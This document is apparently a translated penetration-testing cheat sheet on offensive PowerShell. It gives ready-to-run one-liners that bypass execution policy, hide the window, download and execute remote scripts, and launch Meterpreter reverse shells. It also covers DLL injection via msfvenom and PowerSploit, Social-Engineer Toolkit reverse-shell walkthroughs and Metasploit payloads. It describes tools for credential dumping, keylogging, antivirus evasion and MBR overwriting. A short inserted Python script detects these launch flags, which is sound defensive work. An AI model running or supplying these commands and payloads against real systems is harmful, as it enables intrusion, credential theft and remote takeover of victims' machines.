Starting this as a placeholder post to fill in gradually; it should be finished next year...
Advantages of PowerShell in penetration testing:
- Installed by default on Windows 7 and later
- PowerShell scripts can run entirely in memory
- Rarely triggers antivirus software
- Can call .NET classes
- Can use user credentials (to query Active Directory)
- Can be used to manage Active Directory
- PowerShell scripts can be executed remotely
- Makes Windows script-based attacks easier
Tips
Parameters
- -Exec Bypass: bypasses the execution policy protection. This parameter is very important: by default PowerShell's security policy does not allow running commands and files, and with this parameter any of these protection rules can be bypassed.
- -NonI: non-interactive mode; PowerShell does not present an interactive prompt to the user.
- -NoProfile, or -NoP: PowerShell does not load the current user's profile.
- -noexit: do not exit the shell after execution; very important for scripts such as keyloggers.
- -W Hidden: sets the window style so that the command window stays hidden.
Commands
Download and execute a script
Download a PowerShell script from a server and execute it:
powershell "-NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('[PowerShell URL]'); [Parameters]"
For example, download and execute the Meterpreter PowerShell script:
powershell "-NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.2 -Lport 80"
Download and execute a file
Execute a file locally:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {Import-Module [Path and File of PowerShell]; [Parameters]}"
Run an encoded PowerShell script
For example, run a base64-encoded PowerShell script:
powershell -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]
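From the detection side, as an added example that is not part of the original post: a Python script that scores process command lines (Sysmon Event 1 / Security 4688 style) for the launch flags listed above and decodes the -enc payload so the IEX/DownloadString pattern becomes visible. The prefix-abbreviation rules are my reading of powershell.exe's switch matching, and the sample command line and the example.invalid host are constructed.

```python
import base64
import re

# Launch flags the page lists, matched as powershell.exe accepts them: the full name or
# any prefix of at least min_len chars (assumed; "-ep" is a separate ExecutionPolicy alias).
SUSPICIOUS_FLAGS = {  # label -> ([(name, min_len), ...], required value or None)
    "NoProfile": ([("NoProfile", 3)], None),                                    # -NoP
    "NonInteractive": ([("NonInteractive", 4)], None),                          # -NonI
    "WindowStyle=Hidden": ([("WindowStyle", 1)], "hidden"),                     # -W Hidden
    "ExecutionPolicy=Bypass": ([("ExecutionPolicy", 2), ("ep", 2)], "bypass"),  # -Exec Bypass
    "EncodedCommand": ([("EncodedCommand", 1)], None),                          # -enc, -e
}
# Strings the page's one-liners rely on; checked in the raw line and the decoded payload.
CONTENT_INDICATORS = ["IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
                      "Invoke-Shellcode", "FromBase64String"]

def _flag_pattern(names, value):
    prefixes = [n[:k] for n, min_len in names for k in range(min_len, len(n) + 1)]
    alts = "|".join(re.escape(p) for p in sorted(prefixes, key=len, reverse=True))
    pat = rf"(?<!\S)-(?:{alts})\b"  # longest prefix first; the flag must start a token
    return pat + (rf"\s+{re.escape(value)}\b" if value else "")

FLAG_REGEXES = {k: re.compile(_flag_pattern(*v), re.IGNORECASE) for k, v in SUSPICIOUS_FLAGS.items()}
ENC_ARG = re.compile(_flag_pattern([("EncodedCommand", 1)], None) + r"\s+([A-Za-z0-9+/=]+)",
                     re.IGNORECASE)

def encode_command(script):
    # The -EncodedCommand format: UTF-16LE text, base64 (the page's "-enc [Base64 Code]").
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    # Decoded -enc payload, or None when absent or not valid base64/UTF-16LE.
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline):
    # Score one process command line: 1 point per suspicious flag, 2 per content indicator.
    flags = [k for k, rx in FLAG_REGEXES.items() if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + "\n" + (decoded or "")).lower()
    indicators = [s for s in CONTENT_INDICATORS if s.lower() in haystack]
    return {"flags": flags, "decoded": decoded, "indicators": indicators,
            "score": len(flags) + 2 * len(indicators)}

if __name__ == "__main__":  # constructed sample; example.invalid is a placeholder host
    sample = "powershell -NoP -NonI -W Hidden -Exec Bypass -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")
    print(analyze(sample))
```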
PowerShell script exploitation tools
PowerSploit
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
PowerSploit consists of the following modules and scripts:
CodeExecution
Download the script:
IEX (New-Object Net.WebClient).DownloadString("http://192.168.102.1/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")
Generate a DLL with metasploit:
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.102.1 lport=4444 -f dll -o /var/www/html/PowerSploit/test.dll
Then we download this DLL:
IEX (New-Object Net.WebClient).DownloadString("http://192.168.102.1/PowerSploit/test.dll") (this method cannot be used to download it; download it manually)
When we injected a moment ago we started a new process; this time we inject into an existing process.
We inject into process 3632:
Invoke-DllInjection -ProcessID 3632 -Dll .\test.dll
Note: switch the handler module, since the payload we are using is reverse_tcp.
Once switched, start listening, then execute on this side.
ScriptModification
Modify and/or prepare scripts for execution on a compromised machine.
Out-EncodedCommand
Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
Out-CompressedDll
Compresses, Base-64 encodes, and outputs generated code to load a managed DLL in memory.
Out-EncryptedScript
Encrypts text files/scripts.
Remove-Comments
Strips comments and extra whitespace from a script.
Persistence
Add persistence capabilities to a PowerShell script.
New-UserPersistenceOption
Configure user-level persistence options for the Add-Persistence function.
New-ElevatedPersistenceOption
Configure elevated persistence options for the Add-Persistence function.
Add-Persistence
Add persistence capabilities to a script.
Install-SSP
Installs a security support provider (SSP) DLL.
Get-SecurityPackages
Enumerates all loaded security packages (SSPs).
AntivirusBypass
AV doesn't stand a chance against PowerShell!
Find-AntivirusSignature
Locates single-byte AV signatures using the same method as DSplit from "class101".
Exfiltration
All your data belong to me!
Invoke-TokenManipulation
Lists available logon tokens. Creates processes with other users' logon tokens, and impersonates logon tokens in the current thread.
Invoke-CredentialInjection
Creates logons with clear-text credentials without triggering the suspicious Event ID 4648 (Explicit Credential Logon).
Invoke-NinjaCopy
Copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures.
Invoke-Mimikatz
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided by Mimikatz.
Get-Keystrokes
Logs keys pressed, time and the active window.
Get-GPPPassword
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
Get-GPPAutologon
Retrieves the autologon username and password from registry.xml if pushed through Group Policy Preferences.
Get-TimedScreenshot
A function that takes screenshots at a regular interval and saves them to a folder.
New-VolumeShadowCopy
Creates a new volume shadow copy.
Get-VolumeShadowCopy
Lists the device paths of all local volume shadow copies.
Mount-VolumeShadowCopy
Mounts a volume shadow copy.
Remove-VolumeShadowCopy
Deletes a volume shadow copy.
Get-VaultCredential
Displays Windows Vault credential objects, including clear-text web credentials.
Out-Minidump
Generates a full-memory minidump of a process.
Get-MicrophoneAudio
Records audio from the system microphone and saves it to disk.
Mayhem
Cause general mayhem with PowerShell.
Set-MasterBootRecord
Proof-of-concept code for overwriting the master boot record with a message of your choice.
Set-CriticalProcess
Causes the machine to blue screen upon exiting PowerShell.
Privesc
Tools to help with escalating privileges on a target.
PowerUp
Clearing house of common privilege escalation checks, along with some weaponization vectors.
Recon
Tools to aid the reconnaissance phase of a penetration test.
Invoke-Portscan
Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
Get-HttpStatus
Returns the HTTP status codes and full URLs for specified paths when provided with a dictionary file.
Invoke-ReverseDnsLookup
Scans an IP address range for DNS PTR records.
PowerView
PowerView is a series of functions for performing network and Windows domain enumeration and exploitation.
Recon\Dictionaries
A collection of dictionaries used to aid the reconnaissance phase of a penetration test. The dictionaries were taken from the following sources:
admin.txt - http://cirt.net/nikto2/
generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/
The PowerSploit project and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.
Usage
Refer to the comment-based help in each individual script for detailed usage information.
To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
To use the module, type
Import-Module PowerSploit
To see the commands imported, type
Get-Command -Module PowerSploit
If you are running PowerShell v3 and you want to remove the annoying "Do you really want to run scripts downloaded from the Internet" warning, then once you have placed PowerSploit into your module path, run the following one-liner:
$Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerSploit) ) {Get-ChildItem $_ -Recurse | Unblock-File} }
For help on each individual command, Get-Help is your friend.
Note: the tools contained within this module were all designed so that they can be run individually. Including them in a module simply adds portability.
Nishang
Easy-P
SET
SET's PowerShell attack payloads are under the Social-Engineering Attacks -> Powershell Attack Vectors option.
Run SET:
sudo setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
Enter 1 to select Social-Engineering Attacks
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
Enter 9 to select Powershell Attack Vectors
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
All four options are simple to use. The difference is that option 1 directly generates a one-line PowerShell reverse-connection payload, whereas options 2 and 3 generate a PowerShell script that the target has to download and execute.
Powershell Alphanumeric Shellcode Injector
Enter 1 to select Powershell Alphanumeric Shellcode Injector,
then enter the LHOST and LPORT (default 443) to connect back to; the payload is Meterpreter reverse_https.
set:powershell>1
Enter the IPAddress or DNS name for the reverse host: 192.168.1.1
set:powershell> Enter the port for the reverse [443]:4455
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 355 bytes
Final size of c file: 1516 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: :
After generation it asks whether to start the listener (the msf handler).
Once generation is complete, the payload is saved in txt format under the /root/.set/reports/powershell/ directory.
The payload in this example is:
powershell -w 1 -C "sv vC -;sv b ec;sv ui ((gv vC).value.toString()+(gv b).value.toString());powershell (gv ui).value.toString() '[Base64 Code]'"
Running the payload on the target host yields a reverse shell on the listening machine (provided the listener has been started).
Powershell Reverse Shell
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>2
Enter the IPAddress or DNS name for the reverse host: 192.168.1.1
set:powershell> Enter the port for listener [443]:4455
[*] Rewriting the powershell reverse shell with options
[*] Exporting the powershell stuff to /root/.set/reports/powershell
set> Do you want to start a listener [yes/no]: yes
Listening on 0.0.0.0:4455
When finished, the ps1 script is written in txt format to /root/.set/reports/powershell/powershell.reverse.txt.
Run mv powershell.reverse.txt powershell.reverse.ps1
to rename it to a .ps1 file.
Running that file on the target host yields a CMD shell in the listener on Parrot.
Metasploit
Payloads
msf has 8 PowerShell payloads, namely:
payload/cmd/windows/powershell_bind_tcp normal Windows Interactive Powershell Session, Bind TCP
payload/cmd/windows/powershell_reverse_tcp normal Windows Interactive Powershell Session, Reverse TCP
payload/cmd/windows/reverse_powershell normal Windows Command Shell, Reverse TCP (via Powershell)
payload/windows/powershell_bind_tcp normal Windows Interactive Powershell Session, Bind TCP
payload/windows/powershell_reverse_tcp normal Windows Interactive Powershell Session, Reverse TCP
payload/windows/x64/powershell_bind_tcp normal Windows Interactive Powershell Session, Bind TCP
payload/windows/x64/powershell_reverse_tcp normal Windows Interactive Powershell Session, Reverse TCP
For simply generating a payload and receiving a shell, see the msfvenom and handler usage in Metasploit Basics.
Injecting PowerShell code with msf
Prerequisite: you already have a session and need a PowerShell script to carry out further work.
msf > use post/windows/manage/exec_powershell
msf post(windows/manage/exec_powershell) > show options
Module options (post/windows/manage/exec_powershell):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SCRIPT                    yes       Path to the local PS script or command string to execute
   SESSION                   yes       The session to run this module on.
msf post(windows/manage/exec_powershell) >